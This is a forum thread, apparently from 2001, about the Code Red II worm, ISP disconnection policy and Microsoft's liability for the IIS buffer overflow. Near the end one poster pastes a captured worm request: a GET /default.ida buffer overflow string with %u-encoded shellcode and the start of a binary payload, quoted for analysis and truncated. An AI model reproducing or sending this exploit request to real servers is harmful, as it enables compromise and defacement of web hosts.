| reply to IGGY
Re: Code Red II worm analysis Amen!
»66.120.182.18 (visit this link at your own risk -- I called to see if the ISP was interested in doing something and they told me to fix my stuff instead of addressing the problem) is killing me and my already minimal bandwidth sucks now....I've had it(huge gigantic period here) |
|
| reply to Steve
said by SJFriedl:
said by rayramone:
My question is: Why doesn't AT&T capture these ip's as well, and send a mass email saying "You're running IIS,
When people are causing harm to others, I think that being polite is not appropriate. "Mercy to the guilty is injustice to the innocent" - Adam Smith.
ISPs should pull the plug on these offenders and put them on a reconnect queue. If there is no cost to bad behavior (which includes negligent behavior), people will simply not learn.
Steve
Steve,
I big, huge "right on!!!" to that. What can we do to help? |
|
Anon | reply to Steve
said by SJFriedl:
said by rayramone:
My question is: Why doesn't AT&T capture these ip's as well, and send a mass email saying "You're running IIS,
When people are causing harm to others, I think that being polite is not appropriate. "Mercy to the guilty is injustice to the innocent" - Adam Smith.
ISPs should pull the plug on these offenders and put them on a reconnect queue. If there is no cost to bad behavior (which includes negligent behavior), people will simply not learn.
Steve
And yet, when I suggest that MS pay the cost, you defend them and say-It's just a bug, it's not the end of the world. "If there is no cost to bad behavior (which includes negligent behavior), people will simply not learn." Crackers are a fact of life. While they are, systems must be designed and manufactured to be cracker resistant. |
|
IGGYNo Guru Just Here To HelpPremium,MVM
join:2001-03-30
Chatham, IL | reply to dsldisaster
My thread on that vary subject - looks like they are trying = »Worms prompt AT&T to unplug customer Web sites
But they haven't seemed to get 2 my neighborhood yet = LOL!!
--
Test Your Anti Virus at IGGYZ.COM |
|
|
|
| reply to Anon
We don't live in a perfect world.....yet said by wgu:
systems must be designed and manufactured to be cracker resistant.
Sounds good but it's not reality yet. Thank goodness for "good hackers" (if that's such a term) that raise awareness and educate everyone.  |
|
 SteveI know your IP addressConsultant
join:2001-03-10
Yorba Linda, CA
kudos:5 | reply to Anon
Re: Code Red II worm analysis said by wgu:
And yet, when I suggest that MS pay the cost, you defend them and say-It's just a bug
When I say "It's just a bug", this characterizes intent, not effect. This is not some kind of evil plot by Microsoft or evidence of QA done only by monkeys or flagrant disregard for the customer. It's a pretty damn serious bug, but it's not the work of Satan.
When they were made aware of the problem, they moved very quickly to mitigate the damage, and any liability claim that anybody had on them started to dissolve rapidly. I don't have a good sense for when they are officially "off the hook", but I would say that after five weeks it's just not fair to blame Bill for this.
Steve
--
Stephen J. Friedl / Software Consultant / Tustin, California USA / »www.unixwiz.net |
|
Anon | said by SJFriedl:
said by wgu:
And yet, when I suggest that MS pay the cost, you defend them and say-It's just a bug
When I say "It's just a bug", this characterizes intent, not effect. This is not some kind of evil plot by Microsoft or evidence of QA done only by monkeys or flagrant disregard for the customer. It's a pretty damn serious bug, but it's not the work of Satan.
No, I certainly do not argue that it is the work of Satan, nor do I believe this was deliberate. But when an airplane crashes due a manufacturing defect, noone argues that this was "just a bug" and that the airline company had no intent to crash the plane. They are culpable for not exercising best engineering practice to ensure that the error did not occur. Microsoft did NOT impliment best engineering practice to make sure that this kind of buffer overflow did not occur. That is why they are culpable. Not because of intent, but because of negligence.
quote:
When they were made aware of the problem, they moved very quickly to mitigate the damage, and any liability claim that anybody had on them started to dissolve rapidly. I don't have a good sense for when they are officially "off the hook", but I would say that after five weeks it's just not fair to blame Bill for this
I disagree. Trying to fix negligence after it occurs may mitigate but certainly does not remove culpability. We have seen too many posts here and elsewhere pointing out how in many software firms, security is NOT a prime consideration. That coding engineering practice is not to make sure that the product is as free from these kinds of design error as humanly possible. The culture, and the reward system and the practice is to "get it out the door", not to make sure that these kinds of security bugs are stamped out.
Software writers and companies seem to feel that they are somehow immune from standard engineering responsibility, that sloppy habits, and negligent design and practice are OK. Must arises from the origins in toys and games of computers, where it does not really matter. If a toy does not behave as it should, well noone is really going to take it seriously. But Internet ready programs and operating systems do matter. Companies which reap large profits and claim to be critical to national productivity should have the attendant responsibilities that any other engineering company has. |
|
Anon | reply to Steve
There appears to be another worm out there now. I just (well, it came in 4AM PDT Aug 11) websnarfed an example. This is a type NNNN worm but carries a different payload. It installs a web page (Hacked by Chinese). See ftp.theory.physics.ubc.ca/outgoing/codered
It starts in the same way as standard CodeRed but then changes in its payload.
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a HTTP/1.0^M
Content-type: text/xml
HOST:www.worm.com
Accept: */*
Content-length: 3569 ^M
Cache-Control: bypass-client=202.156.8.37^M
Connection: close^M
Via: 1.0 HHCE8^M
X-Forwarded-For: 202.156.8.37^M
^M
U~Kì~Aì^X^B^@^@SVW~M½èýÿÿ¹~F^@^@^@¸ÌÌÌÌó«Ç~Epþÿÿ^@^@^@^@é
......
It is longer than the either of the other code reds, 4155 bytes rather than 4039 or 3818 bytes . |
|
| This sounds like the original, before it was modified to attack faster and forgo the site defacement. |
|
